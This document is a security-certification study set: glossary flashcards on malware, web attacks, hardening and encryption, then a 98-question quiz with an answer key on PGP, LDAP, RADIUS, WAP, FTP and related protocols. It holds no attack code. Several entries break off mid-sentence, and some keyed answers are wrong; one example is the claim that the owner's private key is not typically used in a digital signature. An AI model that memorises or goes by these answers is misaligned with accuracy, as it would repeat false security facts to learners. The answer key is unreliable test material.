Systems Security
Means not only securing sensitive data against unauthorized access, but also protecting the integrity and existence of that data from malicious users and software.
Virus
A form of destructive malware consisting of a destructive payload and delivery vehicle.
Boot Sector Virus
A type of virus which finds and infects the boot sector and prevents an OS from booting up.
Companion Virus
A type of virus which disguises itself as a legitimate program with a different file extension which is a higher priority than that of the original file.
File-Infector Virus
A type of virus which infects files with the same file extension by overwriting the file.
Macro Virus
A type of virus which is a self contained program that automates a function within an application.
Memory-Resident Virus
A type of virus which embeds itself in the computer memory. It infects other files that run at the same time.
Polymorphic Virus
A type of virus which changes its appearance with each infection, but keeps the same signature.
Metamorphic Virus
A type of virus which changes its appearance and its entire sourcecode with each infection, including the signature.
Stealth Virus
A type of virus which attempts to cover its trail as it infects files by redirecting commands around itself.
Trojan Horse
This program disguises itself as another program and hides on your computer. Back-door software is typically installed by it allowing a hacker access to a client computer that bypasses any authentication.
RAT (Remote Access Trojan)
A trojan in which someone else has control allowing privilege escalation.
Logic Bombs
Malicious software that waits for a trigger event before it releases its payload.
Worms
An independent self-replicating program that spreads copies of itself to other computer systems via network connections, e-mail attachments, and instant messages.
Adware
Unsolicited software advertisements usually installed with a free or low-cost software program.
Spyware
Software that finds out about a user by tracking his habits without his consent.
Rootkit
Seizes control of an OS and hides at the root level. It is used to take ownership of a host computer making it a bot as part of a botnet.
Back-Door Program
Any form of software installed which is not disclosed that can take control of a computer.
Firmware Rootkit
A rootkit embedded within the firmware of a device, such as a computer peripheral or network device.
Kernel Rootkit
A rootkit embedded within the operating system core itself.
Persistent Rootkit
A rootkit enabled when the system starts and will not turn off unless the system shuts down
Application Rootkit
A rootkit activated and run in current system memory only when a specific application is launched and is not persisted when the system is shut down and restarted.
Library Rootkit
A rootkit that uses code library files, such as Windows DLLs, and intercepts specific system and API calls then replaces them with its own code.
Bot
A compromised computer infected by a rootkit that is under a control of an unauthorized user.
Botnet
A collection of compromised computers infected by a rootkit that is under a control of an unauthorized user.
Bot Herder
Individual who controls a botnet.
DDoS (Distributed Denial-of-Service)
An attack on a system launched from multiple sources intended to make a computer's resources or services unavailable to users. They are often launched from zombies in botnets and typically include sustained, abnormally high network traffic. A performance
DoS (Denial-of-Service)
A type of attack in which a hacker overloads a specific server with so much data that their server is too busy to service valid requests coming from real clients on the network.
Security Baseline
A minimum standard that each system and application must meet to supply the absolute minimum standard of protection against security vulnerabilities and to mitigate threats and risks.
Security Templates and Policies
Provide a documented minimum configuration baseline for all of your server and workstation operating systems and applications.
Operating System Hardening
Keeping the OS and any software patches up to date and removing any unnecessary software services from the system.
Service Packs
Software updates rolled into larger software packages.
Signature
A specific binary code created by a virus that can be used as a unique identifier.
Signature Files
Contain thousands of known virus types and special algoriths for detecting common virus-like behaviors.
Cookies
Small files saved on your computer which store data for specific web sites you have visited.
HIDS - Host-Based Intrusion Detection System
A passive IDS used to monitor an individual server or workstation. Protects local resources on the host such as the operating system files.
HIPS - Host-Based Intrusion Prevention System
An extension of a host-based IDS. Designed to react in real time to catch an attack in action. Active IDS.
AES (Advanced Encryption Standard)
The encryption technology used for encrypting the contents of a laptop hard drive.
JavaScript
A scripting language created by Netscape whose code is interpreted by the web brower, not compiled. It can interact with HTML source code, enabling web authors to create web sites with dynamic content.
ActiveX
A Microsoft technology used to create reusable components across Windows web applications. Components can be downloaded to the computer through the web browser.
Buffer Overflow
When input data exceeds the limits recognized by a program. Caused primarily by poor input validation that allows illegal data to be entered.
Privilege Escalation
An unauthorized user exploits security vulnerabilities like poor input validation within sofware applications to gain more privileged access to a computer system.
Proof-of-Concept Exploit
A situation when a potential threat due to a vulnerability in an application or operating system has become know to the general public, enabling makicious hackers to create code to exploit the vulnerability.
Session Hijacking
When a user's cookie for a web site, which can contain session authentication credentials for a remote server, is taken over by another user who then uses that cookie to gain unauthorized access.
CGI (Common Gateway Interface) Scripts
Programs designed to accept and return data that conforms to the CGI specification. The most common way for web servers to interact dynamically with users (like web forms).
XSS (Cross-Site Scripting)
A type of web site application vulnerability that allows malicious users to inject malicious code into dynamic web sites that rely on user input. Can be prevented by careful web programming and strong input validation.
XSRF or CSRF (Cross-Site Request Forgery)
A type of attack in which a hacker users an unsuspecting user's current web browsing state, including session cookie data and login identity credentials, to trick him into navigating to a web site that contains malicious code. The hacker then uses the ses
Header Manipulation
A type of web application vulnerability where invalid or malicious data is inserted into HTTP headers.
XML (Extensible Markup Language)
A markup language that uses tags to define the structure, storage, and transportation of data in web pages.
XML Injection Attack
An attack which modifies how an XML application processes its data. Can be prevented through input and document schema validation.
Command Injection
When a malicious user inputs into URLs or input forms, OS-level commands that are executed on the server.
Directory Traversal
A type of access vulnerability where a hacker can get unauthorized access to files on a web server other than public files that are served on the web site.
Zero-Day Attacks
A type of attack that has rarely or never been encountered. As the attack is brand new, no existing defense has been created to detect it.
FTP (File Transfer Protocol) Servers
Servers used to to transfer files from one system to another across the Internet. Information is sent over the network in clear text.
SFTP (Secure FTP)
This protocol uses SSH for encrypted communications to prevent interception of file transfers from one system to another across the internet.
DNS (Domain Name System) Server
This server translates Internet domain names into IP addresses. Succeptable to DoS and malformed attacks, and DNS poisoning.
DHCP (Dynamic Host Configuration Protocol) Server
A server used to allocate IP addresses and other network information on a network automatically to clients as they access the network. No authentication mechanism to allow or disallow clients.
MAC (Media Access Control) Addresses
As a countermeasure to attacks, DHCP servers can be configured to communicate with clients by their what?
Database Servers
Servers that contain relational data used as a back-end repository of information for front-end applications and web services.
SQL Injection
Insertion of code into front-end applications to run a query on a database to reveal or damage confidential data.
Directory Services
A repository of information regarding the users and resources of a network. To increase security, they should be used with secured, encrypted communications protocols, such as SSL or TLS.
LDAP Injection
Inserting code into user-based input to utilize in a query to an LDAP server.
E-Mail Servers
Servers that store incoming mail for users and are responsible for sending outbound mail from local users to their destination.
POP3 (Post Office Protocol Version 3)
An Internet protocol that provides a way for users to retrieve mail from their inboxes using a POP-enables e-mail client. The e-mail messages are stored on the server until the user connects to it and downloads messages to the e-mail client. Most accounts
IMAP (Internet Message Access Protocol)
Internet protocol used to provide a mechanism for receiving messages from a user's inbox. Gives the user more control over what messages they download and how it stores them online.
SSL (Secure Sockets Layer)
To protect the transfer of credentials from packet sniffers, what should Secure POP and Secure IMAP utilize to encrypt the login passwords?
SMTP (Simple Mail Transport Protocol)
The e-mail message-exchange standard of the Internet for delivering e-mail to its destination server.
Enable SMTP authentication
Disable SMTP relay
What can be done to protect the SMTP server from abuse?
Input Validation
The process of coding applications to accept only sertain valid input for user-entered fields.
Escaping
This technique recognizes specific types of command characters and parses them as simple data rather than executing the text as a command.
Fuzzing
A testing technique that can help test input validation and error/exception handling by entering random, unexpected data into application fields to see how the software program reacts.
Error and Exception Handling
Making sure that a program will still be able to retain its state and continue to function in the event of an error condition.
Transitive Access
This occurs when you have access permissions or trusts between different components of a software application that allow user access to pass through unexpectedly and without proper authorization to access another software component.
Application Hardening
Techniques used to prevent application vulnerabilities from being exploited.
Data Loss Prevention (DLP)
The concept of using security and content control features to prevent confidential, private data from leaving your organization's networks.
TPM (Trusted Platform Module)
A hardware chip installed on a system's motherboard that provides authentication by storing security mechanisms such as passwords, certificates, and encryption keys that are specific to the hardware. The chip contains a built-in RSA key usd for encryption
TPM
This allows the hard drive of a laptop to be encrypted.
HSM (Hardware Security Module)
A specialized hardware appliance used to provide on-board cryptographic functions and processing. Often used for banking applications such as ATMs.
Whole Disk Encryption
Encrypting the entire contents of a computer system's hard drive. Typically includes the disk volume with the OS data but not the master boot record.
Fuzzing
Which of the following will enter random data to the inputs of an application?
Input validation
Which of the following is specifically meant to ensure that a program operates on clean, correct and useful data?
Anti-virus software
Which of the following measures are Edwards most likely to implement to protect against a worm or trojan horse?
Pop-up blocker
As I browse the Internet, I notice that when I go to some sites, multiple additional windows are opened automatically. Many of these windows contain advertisements for products that are inappropriate for your family to view. Which tool can I implement to
Group Policy / WSUS
Which of the following tools I use on a Windows network to automatically distribute and install software and operating system patches on workstations? (select two)
Group Policy
I have contracted with a vendor to supply a custom application that runs on Windows Vista workstations. As new application versions and patches are releaed ,I want to be able to automatically apply these to multiple computers. Which tool would be the best
Run a full scan
I have installed anti-malware software on a computer that only I use. I want to protect the computer from files that I download from the Internet. What should Edwards do next to make sure that there aren't any existing files on my system that are infected
Hotfix
Which of the following terms describes a Windows operating system patch that corrects a specific problem and is released on a short time, periodic basis (typically monthly)?
remote wipe
A smart phone was lost at the airport. There is no way to recover the device. Which of the following will ensure data confidentially on the device?
Screen lock
Which of the following mobile device security consideration will disable the ability to use the device after a short period of inactivity?
Drive lock
Which of the following security encrypts the entire contents of a hard drive?
Bitlocker
I want a security solution that protects the entire hard drive, preventing access, even when it is moved to another system, Which solution would I choose?
EFS
Which of the following security solutions would prevent a user from reading a file which I did not create?
Fuzzing
a process that tests programs for security vulnerabilities, bugs and errors through the use of a testing
tool that will put random, obscure incorrect or malicious data inot the application to determine the
outcome.
Secure Coding Concepts
Developing secure code is a secure by design concept and requires developers and security experts to work
collaboratively during each step of the software development lifecycle process.
Error and exception Handling
a program can either fail safe or fail open. This determines how a program will continue to function when
a serious error or failure occurs.
Input validation
an application that sanitizes the data received from users,
Cross site Scripting Prevention
Running anti malware, run host based IPS, lock down web browsing, releasing security patches.
Cross Site Request Forgery Prevention
install add ons to the web browser, empty temportaty internet files regularly, keep web browsers patched, log off sites when done, avoid remembering logon info in the browser.
Application configuration baseline
serves the role of troubleshooting initiatives and security.
Application Hardening
preventing the use or enabling of specific features and tools. ensuring that certain options like auto save are always enabled, preventing the removal or install or modification of the application etc.
Application Patch Management
the practice of routine maintenance and upkeep of an application service and system patches.
Patch Management
the practice of routine maintenance of an application.
BIOS
this device prepares the machine in a process called bootstrapping
USB Devices
if specialized it can interrupt operation or copy data transparently to the end user
cable locks
used to secure almost anything
Host Software Baselining
the proper operating system version and configuration as well as the appropriate applications required to both protect the system and allow the users to perform their work.
Risk is reduced
if a device is configured to store data in a cloud
1. Because RADIUS is an open architecture it can be expanded and customized individually by each customer.
- True
2. PPTP tunneling uses encapsulated PPP packets containing user information. Which of the choices listed below best describes those packets.
-UDP Packet
-IPX packet
-Control packet
-Compressed packet
-Data packet
- Data packet
3. WEP uses an asymmetrical key to identify wireless devices.
- False
4. Of the key sizes listed, which is not used by Twofish?
-129 bits
-128 bits
-256 bits
-192 bits
- 129 bits
5. The specification for the behavior of ports providing remote access using SNMP is controlled by which IEEE specification?
-802.1x
-802.5x
-802.31x
-802.2x
- 802.1x
6. Signed applets are usually given more privileges that ordinary applets.
- True
7. An attack that sends large amounts of data to a specific field in an application and thereby causes that application to stop performing its intended functions and execute commands on behalf of the attacker is known as what type of attack?
-Macro
-DoS
-
- Buffer Overflow
8. ESP protocol uses by default, which of the encryption types shown below?
-Symmetric
-Asymmetric
- Symmetric
9. What method listed below would be most effective in determining the optimal placement of wireless access points?
-War driving
-Wireless access points should be placed near the most influential employees
-A wireless site survey
-WLAN configuration tool
- A wireless site survey
10. S/MIME 3 and OpenPGP are designed to be interoperable.
- False
11. The acronym ESP corresponds to which choice listed below?
- Encapsulating Security Payload
-Encapsulated Security Payload
-Enterprise Security Perimeter
-None of these
- Encapsulating Security Payload
12. Which choice below best describes the networking technology that enables one network to send its data over another networks connections?
-RADIUS
-RAS
-VPN
-Tunneling
- Tunneling
13. Which of the following would not typically be used as a part of a digital signature?
-The owners private key
-The owners public key
-The owners name
-Digital signatures of a trusted third party
-The owners email address
- The owner's private key
14. Asymmetric encryption is used in conjunction with symmetric encryption by SSL/TLS.
- True
15. The key components of an SSH product are:
- The engine, the administration server, enrollment gateway, and the publishing server.
- The engine, the authentication server, enrollment gateway, and the publishing server.
- The engine, the authentication
- The engine, the administration server, enrollment gateway, and the publishing server.
16. File transfer programs and remote logon processes such as the FTP and Telnet can be replaced with which of the following choices?
-PPTP
-TFTP
-L2TP
-SSH
- SSH
17. Which layer of the WAP protocol stack corresponds to the transport layer of the OSI model?
-WTP
-WAL
-WAP
-WDP
- WDP
18. Which layer of the WAP protocol stack corresponds to the session layer of the OSI model?
-WTP
-WAL
-WAP
-WSP
- WSP
19. Establishing a site on your intranet that contains all authoritative information regarding viruses and other important warnings is part of an acceptable solution aimed at reducing hoaxes.
- True
20. What is the maximum transmission rate supported by the 802.11a standard?
-11 Mbps
-48 Mbps
-54Mbps
-56Mbps
- 54 Mbps
21. Which of the choices below represent the standard data transmission methods of the FTP protocol? (Choose all that apply)
-OpenFTP
-Anonymous FTP
-Active FTP
-Passive FTP
-Blind FTP
- Active FTP
22. S/MIME offers more security services than MIME. Two additional security services that are offered are authentication and privacy. Authentication is accomplished using digital signatures. How is privacy accomplished?
-Digital Certificates
-None of thes
- Encryption
23. Anonymous FTP sites are an excellent tool for the distribution of software updates and patches.
- True
24. Using IPSec it is possible to create a VPN on the fly, on demand, and with anyone else using the standard.
- True
25. OpenPGP software is already integrated into both Microsoft and Netscape products.
- False
26. PPTP tunneling uses two basic packet types. Which choices below represent those packet types? ( choose two)
-Compressed packet
-Control packet
-IPX packet
-Data packet
- Control packet
27. PGP certificates are identical to X.509 Certificates.
- False
28. A message encrypted using the recipient's public key is decrypted by the recipient using which of the choices listed below?
-The recipients Private key
-None of these
-The recipients public key
-Both the recipients Private and Public Keys
- The recipients Private key
29. An LDAP server is not susceptible to major attacks like DoS because of its standards based methods of operation.
- False
30. Participating in a chain letter or perpetuating a hoax causes which of the events listed below?
-Damaged reputation
-Wasted time
-All of these
-Future messages being ignored
- All of these
31. There are typically two parts to a CGI script. Which choices below represent those parts? ( Choose all that apply)
- An HTML page that feeds the input to an executable
-The digital signature
-The CGI agent
-The java applet
- An executable program on t
- An HTML page that feeds the input to an executable
- An executable program on the server.
32. The LDAP directory is organized as a tree-like hierarchical structure. Which of the choices below represents the name of the structure?
-None of these
-Directory Information Tree
-Distinguished Information Tree
-Directory Individual Tree
- Directory Information Tree
33. Which layer of the WAP protocol stack corresponds to the transport layer of the OSI model?
-WTP
-WAL
-WAP
-WDP
- WDP
34. An arbitrary 32 bit number that specifies the group of security protocols being used along with which algorithms and keys is referred to is which of the choices listed below?
-DES
-SPI
-DDS
-ESP
- SPI
35. Which choice below represents the simplest VPN solution?
-A VPN client computer with an internet connection through a firewall and the compatible server product
- A VPN client computer with internet connection and a compatible server product.
-The VPN
- A VPN client computer with internet connection and a compatible server product.
36. Which Protocol listed would be used to enable secure communication with a Web Server?
-SLS
-SSL
-SAD
-DAS
- SSL
37. The topmost level in the LDAP hierarchy is referred to as which choice below?
-SSO
-OU
-Root
-Home
- Root
38. Which 802.11 working group is responsible for fixing security flaws in WLANs?
-802.11b
-802.11d
-802.11i
-802.11c
-802.11a
-802.11g
- 802.11i
39. Which of the following is not a step taken to secure mail messages before they are sent using PGP and/or S/MIME?
-The plaintext message is compressed using ZIP technology (PGP only)
-The message is encrypted using the session key and symmetrical encry
- The recipients private key is added.
40. How many authentication classes does WTLS allow?
-4
-2
-1
-3
-3
41. The acronym HTTPS identifies which of the choices listed below?
-Hypertext Transport Protocol Secure
-Secure Hypertext transfer protocol
-Hypertext transfer Protocol Secure
-Secure Hypertext transport protocol
- Secure Hypertext Transfer Protocol
42. The Triple Data Encryption Standard (3DES) and the International Data Encryption Algorithm both use a 128 bit key.
- False
43. Buffer overflow attacks are easy to coordinate.
- False
44. Which WAP 2.0 feature allows content providers to send information directly to a WAP device without a request from that device?
-WAP TLS
-WAP Gap
-WAP MMS
-Wap Push
- Wap Push
45. The Terminal Access Controller Access Control System was developed by which company listed below?
-Red hat
-Microsoft
-Novell
-Cisco
- Cisco
46. Which of the choices below correctly identifies an open, global specification that is designed to deliver information and services to users of handheld digital wireless devices?
-WTLS
-WEP
-WAP
-IEEE
x
- WAP
47. Commonly found 40 and 56 bit web browsers are considered to have weak encryption because these key sizes can be cracked in a short period of time. Approximately how long would it take to crack a 40 bit key?
-1 day
-1 hour
-1 month
-1 week
- 1 week
48. OpenPGP is compatible with MIME and non-MIME e-mail formats. No special software is necessary.
- False
49. In order to create your own PGP certificate, you must request and be issued specific documentation from a certification authority. Which choice below correctly identifies this documentation?
-X.509 certificate
-3DES key
-All of these
-SHA-1 key
- X.509 certificate
50. SSL/TLS uses ciphers to provide the authentication of end points for end-to-end secure communication.
- False
51. The acronym CRL corresponds to which choice listed below?
-Certificate Reference List
-Committed Resource Locator
-Certificate Revocation List
-Common Resource list
- Certificate Revocation List
52. When attempting to connect to a RADIUS server the user will be prompted for a user name and password by which of the devices shown below?
-EAP
-VPN
-NAS
-SLIP
- NAS
53. Active FTP is the default mode of operation.
- True
54. The smart cards Kerberos and public keys are all supported under which general protocol shown below?
-SSH
-EAP
-Telnet
-RADIUS
- EAP
55. When PGP is used, the plaintext portion of the message is compressed using the same compression methods as those commercially available in products such as WinZIP and PKZIP.
- True
56. When an FTP client establishes a connection to the server the user is authenticated. Which choice below correctly identifies this connection?
-Command connection
-Passive Connection
-Active connection
-None of these
- Command connection
57. Whether or not a signed applet will run and what resources it will be allowed to use is determined by which choice below?( Choose all that apply)
-Signed applets will run automatically
- If the applet is new the browser will display a security confirm
x
- If the applet is new the browser will display a security confirmation
- The end user determines which applets will and will not run
58. Instant Messaging programs have very serious security issues. Which of the choices below represent some of those issues? ( Choose all that apply)
- The communications are not encrypted.
- They can provide access to sensitive or confidential data.
-Wel
- They can provide access to sensitive or confidential data.
- It is possible to transmit files that contain viruses and Trojan horses.
59. If an individual's Distinguished Name is represented as: cn= John J Doe, ou= Standards and Practices Department, o= International Business Devices , c=United States . Which portion of this name represents the individuals common name?
-c
-o
-ou
-cn
- cn
60. PGP supports four major conventional encryption methods. Which of the following is not a supported encryption method?
-IDEA
-CAST
-DSA
-Twofish
-3DES
- DSA
61. The wildcard symbol (*) is used in which of the attack types listed below?
-Glob Vulnerability
-Bounce attack
-Clear Text attack
-All of these
- Glob Vulnerability
62. Two commonly used protocols for managing the security of message transmission across the "insecure" Internet are:
-PGP
-Secure Sockets Layers (SSL)
-Open PGP
-Transport Layer Security (TLS)
- Secure Sockets Layer (SSL)
- Transport Layer Security (TLS)
63. Which of the choices below correctly identifies the optional security mechanism that was specified by the 802.11 protocol in order to provide authentication and confidentiality in a wireless LAN environment?
-WTLS
-WEP
-WAP
-TLS
- WEP
64. Handshaking is a process that computers use to determine which of the following choices below?
-Available services
-Authentication
-Routing
-Communication parameters
- Communication parameters
65. If an individual's Distinguished Name is represented as: cn= John J Doe, ou= Standards and Practices Department, o= International Business Devices , c=United States . Which portion of this name represents the individuals' country?
-c
-o
-ou
-cn
- c
66. A signed applet is subject to the restrictions of the sandbox model.
- False
67. Authentication, data encryption, and privacy for WAP 1.x is provided by which protocol listed below?
-WTLS
-WTLP
-WTTS
-WTSL
- WTLS
68. War Driving can be used by unauthorized users to gain access to wireless networks.
- True
69. Two major hash functions are used today. Which two choices below represent these functions?
-SHA-5
-SHA-1
-NSA-1
-MD-5
-MD1
- SHA-1
- MD-5
70. The IPSec protocol does not support down level IP standards such as IPv4.
- False
71. The Secure File Transfer Protocol takes the traditional components of FTP and adds the security of SSH2 technology.
- False
72. Virtual network computing (VNC ) connections cannot be tunneled using an open SSH connection.
- False
73. ActiveX components containing malicious embedded Visual Basic code can be inserted into Microsoft Office documents by using which of the choices listed below?
-URL
-Macros
-JavaScript
-None of these
- Macros
74. LDAP communication is secured through a standards-based interface. This interface is referred to by which acronym listed below?
-SSL
-SASL
-ACL
-PKI
- SASL
75. The LDAP protocol provides authentication on three levels. Which of the choices below does not represent an LDAP authentication level?
-PKI
-SASL
-No authentication
-Simple authentication
- PKI
76. Active FTP is a considerable security risk because it allows which type of connections?
-Active
-Inbound
-Outbound
-Passive
- Inbound
77. Private certificate authorities are often used when no other relationship exists between two parties and they need to establish each other's identity.
- False
78. S/MIME recommends three symmetric encryption algorithms. Which of the choices below does not represent one of these recommended symmetric encryption algorithms?
-DES
-RC2
-3DES
-RSA
- RSA
79. In a TACACS+ session which choices below best describe what gets encrypted? (Choose two)
-Username, password and random packets for security
- The information concerning username, authorized services, and other information.
- The entire body of the pa
- The information concerning username, authorized services, and other information.
- The entire body of the packet.
80. Public key encryption is 1,000 times faster than conventional encryption.
- False
81. As an e-mail message is transported across the Internet it is handled by numerous SMTP servers. What does each SMTP server do to an e-mail message before forwarding it?
-None of these
-reassembles it
-disassembles it
-stamps it
- stamps it
82. ESP has the capability of hiding the regional source and destination addresses from public network users.
- True
83. The brief period of time it takes a WAP Gateway to convert the data from WSP to HTTP and vice versa is best described by which term listed below?
-WAP TLS
-WAP Gap
-WAP Lag
-Wap Push
- WAP Gap
84. Application programming that does not check the size of the input fields is vulnerable to which attack type listed below?
-Cookies
-Macro
-Buffer Overflow
-JavaScript
- Buffer Overflow
85. Which LDAP operation will discontinue an operation that is in progress?
-Close
-Abandon
-Bind
-Unbind
-Delete
- Abandon
86. Which of the following security loopholes have been associated with JavaScript running on various browsers?
-All of these
-Monitor web Browsing
-Reading passwords and other Systems files
-Reading browser's preferences
- All of these
87. The two main types of encryption are:
-Digital Certificates
-Message Digest
-Conventional Encryption
-PGP
-Public Key cryptography
- Conventional encryption
- Public key cryptography
88. All FTP implementations support operating in passive mode.
- False
89. The FTP protocol is one of the earliest and most secure applications based on the TCP/IP protocol.
- False
90. The acronym PGP represents which of the choices listed below?
-Powerful Gateway Private
-Pretty Good Privacy
-Private Generic Protocol
-Pretty Good Protocol
- Pretty Good Privacy
91. TACACS+ separates authentication, authorization and accounting functions. Which of these functions are combined using RADIUS? (Choose two)
-Passwords
-Authentication
-Authorization
-Accounting
- Authentication
- Authorization
92. A VPN provides the added security of being highly fault tolerant.
- False
93. A process known as error handling exception manipulates error requests that are exchanged with the server. Which choice below correctly identifies these requests?
-Cookies
-Applets
-Buffer Overflows
-404 File Error
- 404 File Error
94. Which 802.11 standard adds multimedia and Quality of Service(QoS) capabilities to the MAC layer?
- 802.11b
- 802.11i
- 802.11m
- 802.11c
- 802.11a
- 802.11e
- 802.11e
95. RADIUS provides a system of distributed security for networks and network services. The primary use is to facilitate which type of connection shown below?
-None of these
-Remote
-Terminal
-Local
- Remote
96. The LDAP protocol provides the ability to authenticate users once and enable them to access mixed operating systems, different software packages, and other resources that normally would have required multiple authentications. Which acronym below repre
- SSO
97. Where does the RADIUS client/server architecture store its security information?
-In a single central database
-On each client
-On specific predetermined devices
-On the RAS
- In a single, central database.
98. The 802.11k working group was established to create MAC bridging functionality.
- False